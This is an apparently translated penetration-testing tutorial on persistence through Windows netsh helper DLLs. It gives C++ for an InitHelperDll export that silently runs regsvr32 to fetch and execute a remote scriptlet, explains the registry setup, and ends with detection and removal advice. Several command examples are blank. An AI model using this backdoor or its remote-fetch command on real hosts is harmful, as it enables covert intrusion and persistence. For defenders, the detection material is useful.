About:

  • Common commands of netsh
  • Matthew Demaske's method of using netshell to execute malicious DLLs and maintain persistence on a host
  • Write a DLL with the InitHelperDll function
  • How to use
  • Detection

Table of Contents:

  • Introduction to common commands of netsh
  • Testing Matthew Demaske's shared method—using netshell to execute malicious DLLs and maintain persistence on a host
  • How to write a helper DLL in C++ with the export function InitHelperDll
  • Practical exploitation testing
  • Defense and detection

Reference:

http://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/

0x00 Introduction

---

In penetration testing, using commands natively supported by the system can often bypass various detections and interceptions. For example, in my article 'Use bitsadmin to maintain persistence and bypass Autoruns', I introduced how to leverage the system's native bitsadmin tool to achieve persistence and evade detection by Autoruns.

Matthew Demaske recently shared a method he discovered, which similarly utilizes commands natively supported by the system—using netshell to execute evil DLLs and persist on a host. This article will organize his method and supplement the DLL writing techniques not covered in detail in the original post.

0x01 Introduction to netsh

---

Netsh is a powerful network configuration command-line tool provided by the Windows operating system. Common commands include:

View IP configuration information:


View network configuration files:

Enable/disable network adapters:

View all TCP connections:


Set local IP, subnet mask, and gateway IP:

Check firewall status:


Enable/disable firewall:



Enter 'netsh /?' to view more detailed command help. Notably, the 'add' command is worth attention. Enter 'netsh add /?' for more details:

netsh add /?

The following commands are available:

Commands in this context:

add helper - Installs a helper DLL.



What would happen if we add a test DLL here?


## 0x02 Writing a Helper DLL
---
Each helper DLL must contain an exported function named InitHelperDll

After adding the helper DLL, netsh will call the exported function InitHelperDll in the helper DLL each time it initializes during loading

Example of InitHelperDll:

DWORD

WINAPI

InitHelperDll(

DWORD dwNetshVersion,

PVOID pReserved

)

{

NS_HELPER_ATTRIBUTES attMyAttributes;

attMyAttributes.guidHelper = g_MyGuid;

attMyAttributes.dwVersion = 1;

attMyAttributes.pfnStart = NetshStartHelper;

RegisterHelper( NULL, &attMyAttributes );

return NO_ERROR;

}




For details on InitHelperDll, refer to the following link:

https://msdn.microsoft.com/en-us/library/windows/desktop/ms708327(v=vs.85).aspx


The article 'Code Execution of Regsvr32.exe' previously covered how to add an export function to a DLL, so here is a brief continuation:



Create a new C++ project, set up a DLL project, and add to the main file:

DWORD WINAPI InitHelperDll(DWORD dwNetshVersion,PVOID pReserved)

{

char *command="cmd.exe /c start regsvr32.exe /s /n /u /i:https://raw.githubusercontent.某开源项目.sct scrobj.dll";

WinExec(command,SW_HIDE);

return 0;

}


Add export function declaration:

File type:

Text File

Name:

Same name file.def


Write

EXPORTS
InitHelperDll





Compile then

**Note:**

Marc Smeets shared his POC code, defining export functions using another method:

extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)


The payload creates a new thread to execute shellcode

**Project repository is as follows:**

https://github.com/outflankbv/NetshHelperBeacon


## 0x03 Adding a custom helper DLL
---
**Note:**

Administrator privileges are required

Add via cmd:

As shown in the figure

Alt text

As shown below, registry keys are created synchronously

Alt text

Location: ``HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh

Name: ``netshtest

Type: ``REG_SZ

Data: ``c:\test\netshtest.dll

Note:

Adding key-value directly via registry has the same effect as adding helper dll via netsh add

0x04 Trigger backdoor

---

After helper dll is successfully added, c:\test\netshtest.dll will be loaded every time netsh is called

As shown in the figure, running netsh command loads c:\test\netshtest.dll and launches calculator

Alt text

Verification:

  • Use Process Explorer to view dlls loaded by netsh process

As shown in the figure

Alt text

  • Can also be viewed in Event Properties of process attributes using Process Monitor

As shown in the figure

Alt text

0x05 Persistence

---

  • Since netsh is a commonly used system command, there is a probability that it will be used normally by users, so simply launching netsh can trigger the payload.
  • If added as a common startup item, it is also quite deceptive because only netsh.exe is displayed as starting.

0x06 Detection

---

Monitor the registry location: ``HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh``

Note:

  • The `netsh show helper` command cannot detect newly added helper DLLs.
  • Be aware of whether normal DLLs in the registry have been replaced.

0x07 Removal

---

Via cmd:


Via registry:

0x08 Summary

---

  • The prerequisite for Netsh Persistence is that administrator privileges have already been obtained.
  • Some VPN software calls the netsh command during startup, which solves the self-starting issue of Netsh Persistence. This method is worth testing.
  • If netsh is found in the startup items, it is worth noting, and it is necessary to check whether the corresponding registry key contains malicious helper DLLs.
  • The default key values under the registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh differ across systems, requiring comparison to determine if the default key values have been tampered with.